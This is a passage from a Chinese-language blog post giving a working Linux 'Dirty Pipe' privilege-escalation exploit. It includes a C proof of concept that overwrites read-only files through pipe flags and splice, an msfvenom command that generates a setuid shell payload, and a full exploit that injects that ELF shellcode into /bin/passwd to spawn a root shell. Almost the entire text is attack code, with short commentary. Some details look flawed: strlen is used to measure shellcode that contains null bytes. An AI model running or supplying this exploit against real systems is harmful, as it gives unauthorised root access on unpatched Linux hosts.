puts("[*] Setting all pipe_buffer to PIPE_BUF_FLAG_CAN_MERGE");
pipe(pipe_fd);
pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ);
buffer = (char *)malloc(pipe_size);
for (int size_left = pipe_size; size_left > 0;)
{
int pre_write = size_left > page_size ? page_size : size_left;
size_left -= write(pipe_fd[1],buffer,pre_write);
}
for (int size_left = pipe_size; size_left > 0;)
{
int pre_write = size_left > page_size ? page_size : size_left;
size_left -= read(pipe_fd[0],buffer,pre_write);
}
puts("[*] flags setting success");
puts("[*] read one bytes from the file by splice");
offset_infile--;
retval=splice(target_filefd,&offset_infile,pipe_fd[1],NULL,1,0);
if(retval<0)
{
errExit("Splice error");
}
else if (retval==0)
{
errExit("Splice is small");
}
puts("[*] splice done");
retval=write(pipe_fd[1],argv[3],data_length);
if(retval<0)
{
errExit("write error");
}
else if(retval<data_length)
{
errExit("write too short");
}
puts("[*] done");
}
编译命令
bashgcc poc.c -o poc -static -masm=intel -g
这里可以选用跟脏牛类似的提权思路 可以新建Root用户提权
或者SUID提权
这里选择SUID提权
使用MSF生成payload
bashmsfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i
EXP如下
c#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <strings.h>
#include <sys/stat.h>
#include <sys/user.h>
void errExit(char *buf)
{
printf("[x] ERROR: %s", buf);
exit(EXIT_FAILURE);
}
unsigned char shellcode[]={0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05};
int main(int argc, char **argv, char **envp)
{
size_t page_size;
size_t offset_infile;
int target_filefd;
struct stat target_filestat;
size_t data_length;
int pipe_fd[2];
int pipe_size;
char *buffer;
int retval;
page_size = sysconf(_SC_PAGESIZE);
offset_infile = 1;
if (offset_infile % page_size == 0)
{
errExit("Can't write on a whole page");
}
target_filefd = open("/bin/passwd", O_RDONLY);
if (target_filefd < 0)
{
errExit("Open error");
}
if (fstat(target_filefd, &target_filestat) < 0)
{
errExit("fstat error");
}
data_length = strlen(shellcode);
if (offset_infile + data_length > target_filestat.st_size)
{
errExit("Can't enlarge file");
}
if ((offset_infile % page_size + data_length) > page_size)
{
errExit("Can't write across pages");
}
puts("[*] Start exploiting..");
puts("[*] Setting all pipe_buffer to PIPE_BUF_FLAG_CAN_MERGE");
pipe(pipe_fd);
pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ);
buffer = (char *)malloc(pipe_size);
for (int size_left = pipe_size; size_left > 0;)
{
int pre_write = size_left > page_size ? page_size : size_left;
size_left -= write(pipe_fd[1],buffer,pre_write);
}
for (int size_left = pipe_size; size_left > 0;)
{
int pre_write = size_left > page_size ? page_size : size_left;
size_left -= read(pipe_fd[0],buffer,pre_write);
}
puts("[*] flags setting success");
puts("[*] read one bytes from the file by splice");
offset_infile--;
retval=splice(target_filefd,&offset_infile,pipe_fd[1],NULL,1,0);
if(retval<0)
{
errExit("Splice error");
}
else if (retval==0)
{
errExit("Splice is small");
}
puts("[*] splice done");
retval=write(pipe_fd[1],shellcode,data_length);
if(retval<0)
{
errExit("write error");
}
else if(retval<data_length)
{
errExit("write too short");
}
system("/bin/passwd");
puts("[*] done");
}
本文作者:Du4t
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!